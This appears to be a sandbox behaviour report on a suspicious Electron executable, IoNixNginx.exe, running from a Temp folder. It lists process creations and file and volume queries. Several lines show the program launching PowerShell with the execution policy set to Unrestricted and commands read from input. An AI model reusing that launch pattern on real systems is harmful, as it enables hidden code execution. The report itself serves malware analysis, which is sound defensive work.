Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcpJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe "c:\users\user~1\appdata\local\temp\2pvtpes5t7aov3exnwrywytfi10\ionixnginx.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\hgekorcpiasneymc" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaabgaaaaaaaaagaaaaaaaaaaiaaaaaaaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1848 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe "c:\users\user~1\appdata\local\temp\2pvtpes5t7aov3exnwrywytfi10\ionixnginx.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\hgekorcpiasneymc" --mojo-platform-channel-handle=2184 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe "c:\users\user~1\appdata\local\temp\2pvtpes5t7aov3exnwrywytfi10\ionixnginx.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\hgekorcpiasneymc" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaabgaaaaaaaaagaaaaaaaaaaiaaaaaaaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1848 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe "c:\users\user~1\appdata\local\temp\2pvtpes5t7aov3exnwrywytfi10\ionixnginx.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\hgekorcpiasneymc" --mojo-platform-channel-handle=2184 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8Jump to behavior
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: ..\..\electron\shell\browser\ui\views\electron_views_delegate_win.ccGetAppbarAutohideEdgesShell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeQueries volume information: C:\Users VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeQueries volume information: C:\Users\user VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeQueries volume information: C:\Users\user\AppData VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeQueries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
